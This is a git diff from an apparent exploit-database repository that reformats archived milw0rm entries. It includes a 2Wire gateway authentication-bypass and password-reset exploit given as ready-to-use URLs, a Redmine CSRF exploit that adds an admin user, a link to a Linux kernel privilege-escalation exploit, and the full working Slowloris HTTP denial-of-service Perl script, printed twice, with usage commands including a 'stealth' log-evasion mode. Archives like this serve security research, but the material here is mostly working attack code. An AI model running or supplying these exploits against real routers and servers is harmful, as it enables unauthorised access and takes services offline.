-hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm - -Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv - - - GREETS ------------- -sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3 -hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa -Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield - - Comunidad Underground de Mexico : https://www.underground.org.mx - - - h k m - http://www.hakim.ws - -# milw0rm.com [2009-08-12] +2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09) +============================================================== + + + DESCRIPTION +----------------- +There is an authentication bypass vulnerability in page=CD35_SETUP_01 that +allows you to set a new password even if the password was previously set. + +By setting a new password with more than 512 characters the password gets +reset and next time you access the router you will be prompted for a new +password. 
+ + + VULNERABLE +---------------- +2Wire 2071 Gateway +2Wire 1800HW +2Wire 1701HG + + Firmware +5.29.51 +3.17.5 +3.7.1 + + NOT VULNERABLE +-------------------- + Firmware +5.29.135.5 or later + + + DISCLOSURE TIMELINE +------------------------- +03/27/2009 - 2wire Contacted no satisfactory response +07/11/2009 - Sent complete details to 2wire no response +07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response +08/02/2009 - Made public @ Defcon 17 + + + EXPLOIT/POC +----------------- +Authentication Bypass - just use this page to set a new password + + http://gateway.2wire.net?xslt?page=CD35_SETUP_01 + +Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv + + +Password Reset - using the same form but sending a password > 512 characters + +http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh +kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm + +Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv + + + GREETS +------------ 
+sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3 +hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa +Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield + + Comunidad Underground de Mexico : https://www.underground.org.mx + + + h k m + http://www.hakim.ws + +# milw0rm.com [2009-08-12] diff --git a/platforms/linux/local/141.c b/platforms/linux/local/141.c index bf61ebd1c..6e598ab94 100755 --- a/platforms/linux/local/141.c +++ b/platforms/linux/local/141.c @@ -45,6 +45,6 @@ int main( void ) fork(); return( 0 ); -} - -// milw0rm.com [2004-01-06] +} + +// milw0rm.com [2004-01-06] diff --git a/platforms/linux/local/142.c b/platforms/linux/local/142.c index 360d4145e..b63ca68a6 100755 --- a/platforms/linux/local/142.c +++ b/platforms/linux/local/142.c @@ -135,6 +135,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-01-07] +} + +// milw0rm.com [2004-01-07] diff --git a/platforms/linux/local/145.c b/platforms/linux/local/145.c index f37712462..3727b46bf 100755 --- a/platforms/linux/local/145.c +++ b/platforms/linux/local/145.c @@ -407,6 +407,6 @@ int main(void) return 0; } - - -// milw0rm.com [2004-01-15] + + +// milw0rm.com [2004-01-15] diff --git a/platforms/linux/local/154.c b/platforms/linux/local/154.c index 6edbb8376..58b5de2ae 100755 --- a/platforms/linux/local/154.c +++ b/platforms/linux/local/154.c @@ -95,6 +95,6 @@ int main( void ) return( 0 ); } - - -// milw0rm.com [2004-02-18] + + +// milw0rm.com [2004-02-18] diff --git a/platforms/linux/local/160.c b/platforms/linux/local/160.c index 4ec3637d6..fa60ee86d 100755 --- a/platforms/linux/local/160.c +++ b/platforms/linux/local/160.c @@ -295,6 +295,6 @@ int main(int ac, char **av) } return 0; -} - -// milw0rm.com [2004-03-01] +} + +// milw0rm.com [2004-03-01] diff --git a/platforms/linux/local/33395.txt b/platforms/linux/local/33395.txt new file mode 100755 index 000000000..c28b7cc92 --- /dev/null 
+++ b/platforms/linux/local/33395.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37277/info + +Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions. + +Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks. + +Successful exploits will result in the complete compromise of affected computers. + +http://www.exploit-db.com/sploits/33395.tgz \ No newline at end of file diff --git a/platforms/linux/remote/33402.txt b/platforms/linux/remote/33402.txt new file mode 100755 index 000000000..c15cac88a --- /dev/null +++ b/platforms/linux/remote/33402.txt @@ -0,0 +1,37 @@ +source: http://www.securityfocus.com/bid/37322/info + +Ruby on Rails is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. + +/** +* Redmine <= 0.8.6 CSRF Add Admin User Exploit +* Discovered by: p0deje (http://p0deje.blogspot.com) +* Application: http://www.redmine.org/wiki/redmine/Download +* SA: http://www.redmine.org/news/30 +* Date: 13.11.2009 +* Versions affected: <= 0.8.6 +* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights +*/ + + + +
+ + + + + + + + + +
+ + + + +/** +* P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users. +* Thus, you can add POST data with token of any user and exploit will be working again +*/ diff --git a/platforms/multiple/dos/8976.pl b/platforms/multiple/dos/8976.pl index 1795e1f1b..01317d740 100755 --- a/platforms/multiple/dos/8976.pl +++ b/platforms/multiple/dos/8976.pl 
@@ -1,466 +1,466 @@ -#!/usr/bin/perl -w -use strict; -use IO::Socket::INET; -use IO::Socket::SSL; -use Getopt::Long; -use Config; - -$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors - -print < \$shost, - 'dns=s' => \$host, - 'httpready' => \$httpready, - 'num=i' => \$connections, - 'cache' => \$cache, - 'port=i' => \$port, - 'https' => \$ssl, - 'tcpto=i' => \$tcpto, - 'test' => \$test, - 'timeout=i' => \$timeout, - 'version' => \$version, -); - -if ($version) { - print "Version 0.7\n"; - exit; -} - -unless ($host) { - print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; - print "\n\tType 'perldoc $0' for help with options.\n\n"; - exit; -} - -unless ($port) { - $port = 80; - print "Defaulting to port 80.\n"; -} - -unless ($tcpto) { - $tcpto = 5; - print "Defaulting to a 5 second tcp connection timeout.\n"; -} - -unless ($test) { - unless ($timeout) { - $timeout = 100; - print "Defaulting to a 100 second re-try timeout.\n"; - } - unless ($connections) { - $connections = 1000; - print "Defaulting to 1000 connections.\n"; - } -} - -my $usemultithreading = 0; -if ( $Config{usethreads} ) { - print "Multithreading enabled.\n"; - $usemultithreading = 1; - use threads; - use threads::shared; -} -else { - print "No multithreading capabilites found!\n"; - print "Slowloris will be slower than normal as a result.\n"; -} - -my $packetcount : shared = 0; -my $failed : shared = 0; -my $connectioncount : shared = 0; - -srand() if ($cache); - -if ($shost) { - $sendhost = $shost; -} -else { - $sendhost = $host; -} -if ($httpready) { - $method = "POST"; -} -else { - $method = "GET"; -} - -if ($test) { - my @times = ( "2", "30", "90", "240", "500" ); - my $totaltime = 0; - foreach (@times) { - $totaltime = $totaltime + $_; - } - $totaltime = $totaltime / 60; - print "This test could take up to $totaltime minutes.\n"; - - my $delay = 0; - my $working = 0; - my $sock; - - if ($ssl) { - if ( - $sock = new IO::Socket::SSL( - PeerAddr => "$host", - PeerPort => "$port", - 
Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working = 1; - } - } - else { - if ( - $sock = new IO::Socket::INET( - PeerAddr => "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working = 1; - } - } - if ($working) { - if ($cache) { - $rand = "?" . int( rand(99999999999999) ); - } - else { - $rand = ""; - } - my $primarypayload = - "GET /$rand HTTP/1.1\r\n" - . "Host: $sendhost\r\n" - . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" - . "Content-Length: 42\r\n"; - if ( print $sock $primarypayload ) { - print "Connection successful, now comes the waiting game...\n"; - } - else { - print -"That's odd - I connected but couldn't send the data to $host:$port.\n"; - print "Is something wrong?\nDying.\n"; - exit; - } - } - else { - print "Uhm... I can't connect to $host:$port.\n"; - print "Is something wrong?\nDying.\n"; - exit; - } - for ( my $i = 0 ; $i <= $#times ; $i++ ) { - print "Trying a $times[$i] second delay: \n"; - sleep( $times[$i] ); - if ( print $sock "X-a: b\r\n" ) { - print "\tWorked.\n"; - $delay = $times[$i]; - } - else { - if ( $SIG{__WARN__} ) { - $delay = $times[ $i - 1 ]; - last; - } - print "\tFailed after $times[$i] seconds.\n"; - } - } - - if ( print $sock "Connection: Close\r\n\r\n" ) { - print "Okay that's enough time. 
Slowloris closed the socket.\n"; - print "Use $delay seconds for -timeout.\n"; - exit; - } - else { - print "Remote server closed socket.\n"; - print "Use $delay seconds for -timeout.\n"; - exit; - } - if ( $delay < 166 ) { - print < "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working[$z] = 1; - } - else { - $working[$z] = 0; - } - } - else { - if ( - $sock[$z] = new IO::Socket::INET( - PeerAddr => "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working[$z] = 1; - $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK - } - else { - $working[$z] = 0; - } - } - if ( $working[$z] == 1 ) { - if ($cache) { - $rand = "?" . int( rand(99999999999999) ); - } - else { - $rand = ""; - } - my $primarypayload = - "$method /$rand HTTP/1.1\r\n" - . "Host: $sendhost\r\n" - . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" - . "Content-Length: 42\r\n"; - my $handle = $sock[$z]; - if ($handle) { - print $handle "$primarypayload"; - if ( $SIG{__WARN__} ) { - $working[$z] = 0; - close $handle; - $failed++; - $failedconnections++; - } - else { - $packetcount++; - $working[$z] = 1; - } - } - else { - $working[$z] = 0; - $failed++; - $failedconnections++; - } - } - else { - $working[$z] = 0; - $failed++; - $failedconnections++; - } - } - } - print "\t\tSending data.\n"; - foreach my $z ( 1 .. 
$num ) { - if ( $working[$z] == 1 ) { - if ( $sock[$z] ) { - my $handle = $sock[$z]; - if ( print $handle "X-a: b\r\n" ) { - $working[$z] = 1; - $packetcount++; - } - else { - $working[$z] = 0; - #debugging info - $failed++; - $failedconnections++; - } - } - else { - $working[$z] = 0; - #debugging info - $failed++; - $failedconnections++; - } - } - } - print -"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; - sleep($timeout); - } -} - -sub domultithreading { - my ($num) = @_; - my @thrs; - my $i = 0; - my $connectionsperthread = 50; - while ( $i < $num ) { - $thrs[$i] = - threads->create( \&doconnections, $connectionsperthread, 1 ); - $i += $connectionsperthread; - } - my @threadslist = threads->list(); - while ( $#threadslist > 0 ) { - $failed = 0; - } -} - -__END__ - -=head1 TITLE - -Slowloris - -=head1 VERSION - -Version 0.7 Beta - -=head1 DATE - -06/17/2009 - -=head1 AUTHOR - -RSnake with threading from John Kinsella - -=head1 ABSTRACT - -Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. - -=head1 AFFECTS - -Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...? - -=head1 NOT AFFECTED - -IIS6.0, IIS7.0, lighthttpd, others...? 
- -=head1 DESCRIPTION - -Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. - -As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. - -=head2 Testing - -If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: - -=head3 Testing Example: - -./slowloris.pl -dns www.example.com -port 80 -test - -This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). - -=head2 HTTP DoS - -Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. 
The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. - -=head3 HTTP DoS Example: - -./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 - -=head2 HTTPReady Bypass - -HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. - -=head3 HTTPReady Bypass Example - -./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready - -=head2 Stealth Host DoS - -If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. - -=head3 Stealth Host DoS Example: - -./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com - -=head2 HTTPS DoS - -Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. - -=head3 HTTPS DoS Example: - -./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https - -=head2 HTTP Cache - -Slowloris does support cache avoidance on an experimental basis with the -cache switch. 
Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. - -=head3 HTTP Cache Example: - -./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache - -=head1 Issues - -Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. - -Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. - -For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. - -Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. 
So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. - -=head1 What is a slow loris? - -What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: - -http://www.youtube.com/watch?v=rLdQ3UhLoD4 - -# milw0rm.com [2009-06-17] +#!/usr/bin/perl -w +use strict; +use IO::Socket::INET; +use IO::Socket::SSL; +use Getopt::Long; +use Config; + +$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors + +print < \$shost, + 'dns=s' => \$host, + 'httpready' => \$httpready, + 'num=i' => \$connections, + 'cache' => \$cache, + 'port=i' => \$port, + 'https' => \$ssl, + 'tcpto=i' => \$tcpto, + 'test' => \$test, + 'timeout=i' => \$timeout, + 'version' => \$version, +); + +if ($version) { + print "Version 0.7\n"; + exit; +} + +unless ($host) { + print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; + print "\n\tType 'perldoc $0' for help with options.\n\n"; + exit; +} + +unless ($port) { + $port = 80; + print "Defaulting to port 80.\n"; +} + +unless ($tcpto) { + $tcpto = 5; + print "Defaulting to a 5 second tcp connection timeout.\n"; +} + +unless ($test) { + unless ($timeout) { + $timeout = 100; + print "Defaulting to a 100 second re-try timeout.\n"; + } + unless ($connections) { + $connections = 1000; + print "Defaulting to 1000 connections.\n"; + } +} + +my $usemultithreading = 0; +if ( $Config{usethreads} ) { + print "Multithreading enabled.\n"; + $usemultithreading = 1; + use threads; + use threads::shared; +} +else { + print "No multithreading capabilites found!\n"; + print "Slowloris will be slower than normal as a result.\n"; +} + +my $packetcount : shared = 0; +my $failed : shared = 0; +my $connectioncount : shared = 0; + +srand() if ($cache); + +if ($shost) { + $sendhost = 
$shost; +} +else { + $sendhost = $host; +} +if ($httpready) { + $method = "POST"; +} +else { + $method = "GET"; +} + +if ($test) { + my @times = ( "2", "30", "90", "240", "500" ); + my $totaltime = 0; + foreach (@times) { + $totaltime = $totaltime + $_; + } + $totaltime = $totaltime / 60; + print "This test could take up to $totaltime minutes.\n"; + + my $delay = 0; + my $working = 0; + my $sock; + + if ($ssl) { + if ( + $sock = new IO::Socket::SSL( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working = 1; + } + } + else { + if ( + $sock = new IO::Socket::INET( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working = 1; + } + } + if ($working) { + if ($cache) { + $rand = "?" . int( rand(99999999999999) ); + } + else { + $rand = ""; + } + my $primarypayload = + "GET /$rand HTTP/1.1\r\n" + . "Host: $sendhost\r\n" + . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "Content-Length: 42\r\n"; + if ( print $sock $primarypayload ) { + print "Connection successful, now comes the waiting game...\n"; + } + else { + print +"That's odd - I connected but couldn't send the data to $host:$port.\n"; + print "Is something wrong?\nDying.\n"; + exit; + } + } + else { + print "Uhm... I can't connect to $host:$port.\n"; + print "Is something wrong?\nDying.\n"; + exit; + } + for ( my $i = 0 ; $i <= $#times ; $i++ ) { + print "Trying a $times[$i] second delay: \n"; + sleep( $times[$i] ); + if ( print $sock "X-a: b\r\n" ) { + print "\tWorked.\n"; + $delay = $times[$i]; + } + else { + if ( $SIG{__WARN__} ) { + $delay = $times[ $i - 1 ]; + last; + } + print "\tFailed after $times[$i] seconds.\n"; + } + } + + if ( print $sock "Connection: Close\r\n\r\n" ) { + print "Okay that's enough time. 
Slowloris closed the socket.\n"; + print "Use $delay seconds for -timeout.\n"; + exit; + } + else { + print "Remote server closed socket.\n"; + print "Use $delay seconds for -timeout.\n"; + exit; + } + if ( $delay < 166 ) { + print < "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working[$z] = 1; + } + else { + $working[$z] = 0; + } + } + else { + if ( + $sock[$z] = new IO::Socket::INET( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working[$z] = 1; + $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK + } + else { + $working[$z] = 0; + } + } + if ( $working[$z] == 1 ) { + if ($cache) { + $rand = "?" . int( rand(99999999999999) ); + } + else { + $rand = ""; + } + my $primarypayload = + "$method /$rand HTTP/1.1\r\n" + . "Host: $sendhost\r\n" + . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "Content-Length: 42\r\n"; + my $handle = $sock[$z]; + if ($handle) { + print $handle "$primarypayload"; + if ( $SIG{__WARN__} ) { + $working[$z] = 0; + close $handle; + $failed++; + $failedconnections++; + } + else { + $packetcount++; + $working[$z] = 1; + } + } + else { + $working[$z] = 0; + $failed++; + $failedconnections++; + } + } + else { + $working[$z] = 0; + $failed++; + $failedconnections++; + } + } + } + print "\t\tSending data.\n"; + foreach my $z ( 1 .. 
$num ) { + if ( $working[$z] == 1 ) { + if ( $sock[$z] ) { + my $handle = $sock[$z]; + if ( print $handle "X-a: b\r\n" ) { + $working[$z] = 1; + $packetcount++; + } + else { + $working[$z] = 0; + #debugging info + $failed++; + $failedconnections++; + } + } + else { + $working[$z] = 0; + #debugging info + $failed++; + $failedconnections++; + } + } + } + print +"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; + sleep($timeout); + } +} + +sub domultithreading { + my ($num) = @_; + my @thrs; + my $i = 0; + my $connectionsperthread = 50; + while ( $i < $num ) { + $thrs[$i] = + threads->create( \&doconnections, $connectionsperthread, 1 ); + $i += $connectionsperthread; + } + my @threadslist = threads->list(); + while ( $#threadslist > 0 ) { + $failed = 0; + } +} + +__END__ + +=head1 TITLE + +Slowloris + +=head1 VERSION + +Version 0.7 Beta + +=head1 DATE + +06/17/2009 + +=head1 AUTHOR + +RSnake with threading from John Kinsella + +=head1 ABSTRACT + +Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. + +=head1 AFFECTS + +Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...? + +=head1 NOT AFFECTED + +IIS6.0, IIS7.0, lighthttpd, others...? 
+ +=head1 DESCRIPTION + +Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. + +As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. + +=head2 Testing + +If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: + +=head3 Testing Example: + +./slowloris.pl -dns www.example.com -port 80 -test + +This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). + +=head2 HTTP DoS + +Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. 
The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. + +=head3 HTTP DoS Example: + +./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 + +=head2 HTTPReady Bypass + +HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. + +=head3 HTTPReady Bypass Example + +./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready + +=head2 Stealth Host DoS + +If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. + +=head3 Stealth Host DoS Example: + +./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com + +=head2 HTTPS DoS + +Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. + +=head3 HTTPS DoS Example: + +./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https + +=head2 HTTP Cache + +Slowloris does support cache avoidance on an experimental basis with the -cache switch. 
Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. + +=head3 HTTP Cache Example: + +./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache + +=head1 Issues + +Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. + +Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. + +For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. + +Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. 
So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. + +=head1 What is a slow loris? + +What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: + +http://www.youtube.com/watch?v=rLdQ3UhLoD4 + +# milw0rm.com [2009-06-17] diff --git a/platforms/multiple/dos/8991.php b/platforms/multiple/dos/8991.php index 1f3a6a50c..f3373e261 100755 --- a/platforms/multiple/dos/8991.php +++ b/platforms/multiple/dos/8991.php 
